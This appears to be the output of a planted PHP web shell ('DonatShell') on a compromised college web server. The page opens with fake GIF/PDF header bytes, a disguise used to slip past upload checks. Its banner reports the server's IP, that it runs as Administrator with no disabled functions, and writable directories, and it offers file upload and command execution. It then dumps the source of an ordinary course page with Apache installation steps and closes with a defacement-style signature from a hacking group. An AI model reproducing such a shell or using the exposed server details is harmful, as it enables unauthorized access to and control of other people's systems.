GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/JimMartinson/_Archive/MMDT1021/apache/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/JimMartinson/_Archive/MMDT1021/apache/ApacheInstall.php
<?
// ApacheInstall.php

$TRACK = "<b>".basename(__FILE__).'</b> <span class="pv_fl">('.__FILE__.")</span>\n<ol>\n";
ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$thisFile=__FILE__; $thisLine=__LINE__; include('application.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Course/courseInfo.phpinc');
$title = "Apache Install";
$headTitle = '_CST_ - '.$courseNumber.' '.$courseTitle.' - '.$title;
$pageTitle = $courseNumber.' '.$courseTitle.'<br>'.$title;
$pageMenu = 'Course/courseMenu.phpinc';
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageHeader.phpinc');
$thisFile=__FILE__; $thisLine=__LINE__; include('Login/authenticate.phpinc');
$sectionTitle = $courseNumber.' '.$courseTitle.' - '.$title;
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionHeader.phpinc');
?>
Apache menu: &nbsp;
<span class="currentpage">Part 1: Apache Install &nbsp;</span>
<a href="Apache_Service.php">Part 2: Configure the Apache Service</a> &nbsp;
<a href="ApacheControl.php">Part 3: Setup Apache Control</a> &nbsp;
<a href="ApacheConfigure.php">Part 4: Configure Apache</a> &nbsp;
<br /><br />
Install the Apache Web Server: (part 1 of 4)
</p>
<ol class="instruction">
	<li>Right-click on the link here <a href="../dn/apache_2.2.4-win32-x86-no_ssl.msi">Apache 2.2.4 installer</a> and select <b>Save Target As...</b> if using Internet Explorer (IE) or  <b>Save Lin<u>k</u> As...</b> if using Firefox (FF).
		<br /><img src="SaveTargetAs.jpg" align="top" />&nbsp;<img src="SaveLinkAs.jpg" align="top" />	</li>
	<li>Select the MMDT1021 folder you created and click <b>Save</b>.
		<br /><img src="save.jpg" />	</li>
	<li>Open the MMDT1021 folder and double-click on <b>apache_2.2.4-win32-x86-no_ssl.msi</b> to begin the installation.<br /><img src="apache_2.2.4-win32-x86-no_ssl.msi.jpg" /></li>
	<li>Double-click on the Apache 2.2.4 installer (apache_2.2.4-win32-x86-no_ssl.msi).<br /><img src="apache_01.jpg" /></li>
	<li>Click Next.<br /><img src="apache_02.jpg" /></li>
	<li>Accept the terms.<br /><img src="apache_03.jpg" /></li>
	<li>Click Next.<br /><img src="apache_04.jpg" /></li>
	<li>Click Next.<br /><img src="apache_05.jpg" /></li>
	<li>Enter the <b>Network <u>D</u>omain</b>, <b><u>S</u>erver Name</b>, and <b>Administrator's <u>E</u>mail Address</b>.
		<br />I used cst.rc, apache.cst.rc, and admin@cst.rc.
		<br />It does not matter for our purposes what these are except that they must be valid domain, name, and email address syntax.
		<br /><img src="apache_06.jpg" /></li>
	<li>Click Next.<br /><img src="apache_07.jpg" /></li>
	<li>Select <b>Custom</b>.<br /><img src="apache_08.jpg" /></li>
	<li>Click Next.<br /><img src="apache_09.jpg" /></li>
	<li>Click the Change... button.<br /><img src="apache_10.jpg" /></li>
	<li>Change the <b>Folder name</b> to <b>D:\Apache2.2\</b>
		<br /> &nbsp; If your computer does not have a D: hard-drive use <b>C:\</b>.
		<br /> &nbsp; You must then substitute C: for D: throughout all further instructions for this class.
		<br /><img src="apache_11.jpg" /></li>
	<li>Click OK.<br /><img src="apache_12.jpg" /></li>
	<li>Click Next.<br /><img src="apache_13.jpg" /></li>
	<li>Click Install.<br /><img src="apache_14.jpg" /></li>
	<li>Click Finish.<br /><img src="apache_15.jpg" /></li>
	<li>Open a browser and enter <b>localhost</b> into the address window. Hit enter. You should see a page something like the one below.
		<br /><img src="apache_16.jpg" />
		<br />Don't close the browser, we are going to use it again later. Simply minimize it.	</li>
</ol>
That's it for installing Apache. Now you need to <a href="Apache_Service.php">Configure the Apache Service</a>.
<?
$thisFile = __FILE__; $thisLine=__LINE__; include('common/sectionFooter.phpinc');
$thisFile = __FILE__; $thisLine=__LINE__; include('common/pageFooter.phpinc');

?>

Anon7 - 2022
AnonSec Team